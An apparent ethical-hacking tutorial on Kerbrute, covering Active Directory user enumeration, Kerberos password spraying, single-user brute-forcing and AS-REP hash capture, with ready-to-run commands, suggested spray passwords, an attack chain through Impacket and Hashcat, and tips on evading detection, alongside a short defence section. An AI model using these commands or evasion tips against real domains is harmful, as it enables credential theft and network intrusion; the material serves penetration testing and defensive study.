Ethical Hacking #kerbrute#kerberos#active-directory

Kerbrute: Kerberos User Enumeration and Brute-Forcing

Learn how to use Kerbrute for Kerberos user enumeration and password brute-forcing against Active Directory without triggering account lockouts.

7 min read

Kerbrute is a fast tool for enumerating valid Active Directory usernames and brute-forcing Kerberos credentials without triggering traditional account lockout policies. Written in Go by ropnop, it exploits the Kerberos pre-authentication protocol to test whether usernames exist in a domain and to attempt password spraying — all without generating the Windows event logs that NTLM-based attacks produce.

This guide covers installation, the three main attack modes, operational security considerations, and how to interpret results.

Why Kerbrute?

Traditional brute-force tools like Hydra work by attempting authentication over protocols like SMB or RDP, which log failed attempts as Event ID 4625 (failed logon) and trigger lockout policies quickly. Kerbrute works differently:

  • It sends AS-REQ (Authentication Service Request) packets directly to the Kerberos service on port 88
  • If a username doesn’t exist, the KDC responds with PRINCIPAL UNKNOWN
  • If a username exists but the password is wrong, the KDC responds with INVALID_PASSWORD — critically, this does not increment the lockout counter in most default configurations
  • This allows safe enumeration and carefully paced password spraying

Important caveat: Some hardened environments do count Kerberos pre-authentication failures. Always confirm lockout policy before brute-forcing.

Installing Kerbrute

Download the latest release from GitHub:

wget https://github.com/ropnop/kerbrute/releases/latest/download/kerbrute_linux_amd64 -O kerbrute
chmod +x kerbrute
sudo mv kerbrute /usr/local/bin/

Build from Source

go install github.com/ropnop/kerbrute@latest

Verify:

kerbrute --help

Core Syntax

kerbrute [command] [flags] --dc <domain_controller_ip> --domain <domain>
FlagDescription
--dcIP address of the domain controller
--domainTarget domain name (e.g., corp.local)
--threadsNumber of concurrent goroutines (default: 10)
--outputSave valid usernames/credentials to file
--safeStop on account lockout detection
--delayDelay between attempts in milliseconds
--hash-fileSave captured AS-REP hashes for AS-REP Roasting

Mode 1: User Enumeration

The userenum command tests a list of usernames to find valid accounts in the domain:

kerbrute userenum \
  --dc 192.168.1.10 \
  --domain corp.local \
  /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt \
  -o valid_users.txt

What the Output Looks Like

2026/05/24 10:23:41 >  Using KDC(s):
2026/05/24 10:23:41 >  192.168.1.10:88

2026/05/24 10:23:41 >  [+] VALID USERNAME: jsmith@corp.local
2026/05/24 10:23:41 >  [+] VALID USERNAME: administrator@corp.local
2026/05/24 10:23:41 >  [+] VALID USERNAME: sarah.jones@corp.local
2026/05/24 10:23:42 >  Done! Tested 5000 usernames (3 valid) in 1.234 seconds

Valid usernames are saved to valid_users.txt in a clean format for use with other tools.

Generating Username Lists

Real-world user enumeration requires good wordlists. Generate plausible username formats from employee names discovered through OSINT:

# Common formats: firstname.lastname, flastname, firstnamel
cat employees.txt | awk '{print $1"."$2}' >> usernames.txt
cat employees.txt | awk '{print substr($1,1,1)$2}' >> usernames.txt
cat employees.txt | awk '{print $1}' >> usernames.txt

Tools like namemash.py automate this:

python3 namemash.py names.txt > generated_usernames.txt

Mode 2: Password Spray

Password spraying tries a single password against all users to avoid lockouts. Always check the lockout threshold first (typically 5-10 attempts) and spray with one password at a time, waiting longer than the observation window (usually 30 minutes) between sprays.

kerbrute passwordspray \
  --dc 192.168.1.10 \
  --domain corp.local \
  valid_users.txt \
  "Winter2026!" \
  -o sprayed_creds.txt

Spray with a Delay

Add a delay between attempts for extra caution:

kerbrute passwordspray \
  --dc 192.168.1.10 \
  --domain corp.local \
  valid_users.txt \
  "Password123" \
  --delay 500 \
  -o results.txt

Password Spray Strategy

Effective spray passwords to try:

  1. Season + YearSpring2026, Summer2026!, Winter2025
  2. Company name variationsCorpname1!, Corpname2026
  3. Common defaultsWelcome1, Password1, P@ssw0rd
  4. Policy-compliant patternsJanuary2026!, Monday2026@

Enable the --safe Flag

The --safe flag stops Kerbrute automatically if it detects account lockout responses, protecting you from accidentally locking valid accounts:

kerbrute passwordspray --safe --dc 192.168.1.10 --domain corp.local users.txt "Password1"

Mode 3: Brute-Force a Single User

Test multiple passwords against a single user account:

kerbrute bruteuser \
  --dc 192.168.1.10 \
  --domain corp.local \
  /usr/share/wordlists/rockyou.txt \
  administrator \
  -o admin_results.txt

Use this sparingly and only when you’ve confirmed the lockout policy allows it.

AS-REP Hash Capture

When Kerbrute identifies an account without Kerberos pre-authentication required, it can capture the AS-REP hash for offline cracking — this is AS-REP Roasting:

kerbrute userenum \
  --dc 192.168.1.10 \
  --domain corp.local \
  usernames.txt \
  --hash-file asrep_hashes.txt

Hashes captured in asrep_hashes.txt can be cracked with Hashcat:

hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt

Operational Security

Kerbrute generates minimal Windows event logs, but it is not invisible:

  • Event ID 4768 — Kerberos authentication ticket requests are logged at the DC level
  • High-volume enumeration may alert on anomaly-based IDS/SIEM systems
  • Use --delay to slow down enumeration and blend into normal traffic
  • Avoid running from your real IP — use a foothold inside the network or a VPN

Integrating Kerbrute into a Full AD Attack Chain

Kerbrute is most effective as the first step in an Active Directory attack chain:

1. OSINT → collect employee names → generate username list
2. Kerbrute userenum → confirm valid AD accounts
3. Kerbrute passwordspray → find credentials with weak passwords
4. Use credentials with Impacket tools:
   - GetSPNs.py → Kerberoast
   - GetNPUsers.py → AS-REP Roast (or use Kerbrute --hash-file)
   - secretsdump.py → dump hashes after gaining initial access
5. Hashcat → crack offline hashes
6. Lateral movement → psexec.py, wmiexec.py

Detecting and Defending Against Kerbrute

Security teams should monitor for:

  • High volumes of Event ID 4768 (Kerberos TGT requests) from a single source
  • PRINCIPAL_UNKNOWN Kerberos errors — indicates enumeration
  • Authentication from unusual source IPs or at unusual times
  • Enable Kerberos pre-authentication on all accounts (prevents AS-REP Roasting)
  • Deploy Microsoft Defender for Identity (formerly ATA) for behavioral analytics on Kerberos traffic

Summary

Kerbrute is a precision instrument for Active Directory reconnaissance. Its ability to enumerate valid usernames and spray passwords through Kerberos — while avoiding NTLM lockout counters — makes it a critical first-phase tool in internal network penetration tests. Use it responsibly with the --safe flag, respect lockout policies, and integrate its output into a structured attack chain with Impacket and Hashcat.

#pentesting #user-enumeration #active-directory #kerberos #kerbrute

// related articles

ethical-hacking Impacket Python Toolkit for Windows & AD Pentesting 7 min read ethical-hacking Kerberoasting and AS-REP Roasting: A Practical Guide 9 min read ethical-hacking BloodHound for Active Directory Pentesting 10 min read